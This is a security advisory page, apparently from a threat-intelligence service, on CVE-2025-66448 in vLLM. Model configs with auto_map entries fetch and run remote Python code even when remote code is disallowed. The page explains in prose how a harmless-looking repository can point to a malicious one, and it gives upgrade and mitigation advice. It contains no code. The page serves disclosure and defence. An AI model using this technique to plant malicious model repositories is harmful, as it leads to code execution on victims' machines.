Skip to main content
Press slash or control plus K to focus the search. Use the arrow keys to navigate results and press enter to open a threat.
Reconnecting to live updates…

CVE-2025-66448: CWE-94: Improper Control of Generation of Code ('Code Injection') in vllm-project vllm

0
High
VulnerabilityCVE-2025-66448cvecve-2025-66448cwe-94
Published: Mon Dec 01 2025 (12/01/2025, 22:45:42 UTC)
Source: CVE Database V5
Vendor/Project: vllm-project
Product: vllm

Description

vLLM is an inference and serving engine for large language models (LLMs). Prior to 0.11.1, vllm has a critical remote code execution vector in a config class named Nemotron_Nano_VL_Config. When vllm loads a model config that contains an auto_map entry, the config class resolves that mapping with get_class_from_dynamic_module(...) and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the auto_map string. Crucially, this happens even when the caller explicitly sets trust_remote_code=False in vllm.transformers_utils.config.get_config. In practice, an attacker can publish a benign-looking frontend repo whose config.json points via auto_map to a separate malicious backend repo; loading the frontend will silently run the backend’s code on the victim host. This vulnerability is fixed in 0.11.1.

AI-Powered Analysis

AILast updated: 12/08/2025, 23:16:28 UTC

Technical Analysis

CVE-2025-66448 is a critical remote code execution vulnerability found in the vllm-project's vllm inference and serving engine for large language models (LLMs). The vulnerability exists in versions prior to 0.11.1 within the Nemotron_Nano_VL_Config class. When vllm loads a model configuration containing an auto_map entry, it resolves this mapping using the function get_class_from_dynamic_module(...), which fetches and executes Python code from a remote repository specified by the auto_map string. Crucially, this execution occurs even if the caller explicitly sets trust_remote_code=False, which is intended to prevent execution of untrusted remote code. This design flaw allows an attacker to publish a seemingly benign frontend repository whose config.json references a malicious backend repository via auto_map. When a victim loads this frontend repository, the backend’s malicious code is silently executed on the victim’s host system. This leads to arbitrary code execution with the privileges of the process running vllm. The vulnerability requires network access to fetch the remote code and low privileges but does require user interaction to load the malicious model configuration. The CVSS v3.1 score is 7.1, reflecting high severity due to the potential for full system compromise, affecting confidentiality, integrity, and availability. No known exploits have been reported in the wild as of the publication date, but the vulnerability poses a significant risk given the increasing use of vllm for AI model inference. The issue is resolved in vllm version 0.11.1, which properly respects the trust_remote_code setting and prevents remote code execution via auto_map entries.

Potential Impact

For European organizations, the impact of CVE-2025-66448 can be severe, especially for those deploying vllm for AI model inference and serving. Successful exploitation allows attackers to execute arbitrary code remotely, potentially leading to data breaches, unauthorized access to sensitive information, disruption of AI services, and lateral movement within networks. This could compromise intellectual property, customer data, and critical AI-driven business processes. The vulnerability undermines trust in AI model supply chains by enabling malicious code injection through model configurations. Organizations relying on AI for decision-making, automation, or customer interaction may face operational downtime and reputational damage. Additionally, regulatory compliance risks arise under GDPR if personal data confidentiality is breached. The requirement for user interaction to load malicious configurations suggests targeted attacks, possibly via supply chain or insider threats. Given the growing adoption of AI technologies in Europe, the vulnerability poses a strategic risk to sectors such as finance, healthcare, manufacturing, and government services that increasingly integrate LLMs into their infrastructure.

Mitigation Recommendations

European organizations should immediately upgrade all vllm deployments to version 0.11.1 or later to eliminate this vulnerability. Until upgrades are completed, organizations must implement strict validation and whitelisting of model configurations and repositories before loading them into vllm, ensuring only trusted sources are used. Network controls should be enforced to restrict vllm’s ability to fetch code from untrusted external repositories, including firewall rules and proxy filtering. Monitoring and alerting for unusual outbound connections from vllm hosts can help detect exploitation attempts. Additionally, organizations should adopt supply chain security best practices, such as verifying the provenance and integrity of AI model repositories and using cryptographic signatures where possible. Educating developers and data scientists about the risks of loading untrusted model configurations is critical. Finally, consider isolating vllm inference environments using containerization or sandboxing to limit the impact of potential code execution.

Need more detailed analysis?Upgrade to Pro Console

Technical Details

Data Version
5.2
Assigner Short Name
GitHub_M
Date Reserved
2025-12-01T18:22:06.865Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 692e1c816dbd3477d752f01b

Added to database: 12/1/2025, 10:53:53 PM

Last enriched: 12/8/2025, 11:16:28 PM

Last updated: 1/16/2026, 1:40:16 PM

Views: 382

Community Reviews

0 reviews

Crowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.

Sort by
Loading community insights…

Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.

Actions

PRO

Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.

Please log in to the Console to use AI analysis features.

Need more coverage?

Upgrade to Pro Console in Console -> Billing for AI refresh and higher limits.

For incident response and remediation, OffSeq services can help resolve threats faster.

Latest Threats